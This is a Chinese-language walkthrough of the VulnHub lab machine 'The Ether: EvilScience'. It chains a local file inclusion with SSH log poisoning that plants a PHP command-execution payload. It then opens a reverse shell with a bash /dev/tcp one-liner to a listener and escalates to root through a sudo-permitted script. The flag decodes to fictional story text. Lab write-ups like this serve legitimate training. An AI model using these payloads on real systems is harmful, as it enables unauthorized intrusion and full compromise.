The Ether: EvilScience靶机渗透实战总结

近期朋友给我发了一个靶机，说是他在日志注入的时候遇到了一点小问题，让我帮忙解决一下。下载下来以后，感受这个靶机仍是挺不错的，里边有一些套路，因而整理成一篇文章，感兴趣的小伙伴能够本身尝试一下。

靶机下载
https://www.vulnhub.com/entry...

信息收集
首先扫描内网，发现目标主机ip arp-scan -l

使用nmap对目标ip进行扫描
nmap -sV -A -T4 192.168.1.20

发现22和80端口是开放的，分别是ssh和http服务
使用http协议访问目标网站
http://192.168.1.20/

浏览该网站，主要发现下面几点
·发现该网站存在这么一个url，存在LFI（本地文件包含）
http://192.168.1.20/index.php...

·在about us页面中发现了一个邮箱，极可能是某个地方会用到的用户名

·RESEARCH页面中有不少的单词，若是有须要的话能够用于生成字典

漏洞利用

尝试了一下经常使用的路径并无什么发现，因而在github上的SecLists中找到了LFI-JHADDIX.txt文件，使用burpsuite中的intruder进行尝试，终于发现了一个能够查看的路径（SecList中还有其余文件，有兴趣的能够看一下）
https://github.com/danielmies...（Fuzzing路径下）
抓包，而后右键发送到intruder

设置字典

发现有结果中有几条返回的数据包跟其余的不一样，一一尝试访问

/var/log/lastlog 能访问，可是没有什么有用的数据

/var/run/utmp 也没有什么有用的数据

/var/log/auth.log 重定向回了首页（注意这个URL）

下面是包含其余文件的结果

查看/var/log/auth.log时重定向回首页，说明应该隐藏了什么东西，咱们查看一下响应数据包
点击HTTP history，找到刚刚发的包，点击response，能够发现返回的数据包中，确实存在日志

也可使用curl来请求
curl -is http://192.168.1.20/?file=/va...

注：如下操做以前须要保存快照，若是长时间没有成功注入并执行任意命令，建议恢复快照；而且一旦出现这种状况，即curl命令没有返回结果，须要恢复快照，从新操做。

为了进一步测试，尝试登录ssh，再读取一遍日志发现ssh的操做被记录到日志里

既然ssh的操做能够被记录到日志中，那么能够尝试是否可以经过日志注入+文件包含来执行任意命令
尝试注入一段php代码
ssh '<?php system($_GET[cmd]);?>'@192.168.1.20（不能用双引号，而且?php中间不能有空格）

查看一下最新的日志
curl -is 'http://192.168.1.20/index.php...'
用户名被隐藏掉了

尝试经过php代码来执行命令ls
curl -is 'http://192.168.1.20/index.php...'
发现该路径下有一个xxxlogauditorxxx.py的python脚本

既然能够执行任意命令，咱们尝试一下反弹一个持久化的shell
各类环境下的反弹shell方法能够查看该网站
http://www.zerokeeper.com/exp...
首先设置端口监听
nc -nlvp 9999

尝试使用
curl -is 'http://192.168.1.20/index.php... bash -i >& /dev/tcp/192.168.1.66/9999 0>&1'
经过报错信息发现，必须使用url编码才能被识别

编码后
curl -is 'http://192.168.1.20/index.php...'
并无成功反弹

最简单的方法是使用-e，也没有成功
继续尝试不能使用-e的选项
curl -is 'http://192.168.1.20/index.php...'
反弹shell成功

提权
查看一下当前用户

使用sudo -l查看一下权限

可使用sudo权限不须要密码执行xxxlogauditorxxx.py，
查看一下该文件
这是一个超长的python脚本，里边有很大一部份内容使用了base64编码

尝试运行该脚本

在这个python脚本中，咱们能够执行命令，当咱们运行/var/log/auth.log | id命令的时候，咱们以root身份来执行

因而咱们就能够经过python脚本和/var/log/auth.log |命令进行配合得到root权限
在/root目录下找到了flag.png文件
/var/log/auth.log | ls /root

把他复制到公共目录，而后使用wget下载下来
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png

wget http://192.168.1.20/?file=fla...

打开发现是这么一个图片

使用cat查看一下发现有不少乱码和一部分使用base64编码的内容

flag后面的内容使用的base64编码，这应该就是咱们要寻找的内容
对这段文字进行解码，That’s right! It’s great!
october 1, 2017.
We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!

October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.

October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.

October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.

October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.

October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.

October 10, 2017.
Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.

October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.

October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.

--Document scheduled to be shredded on October 15th after PSA.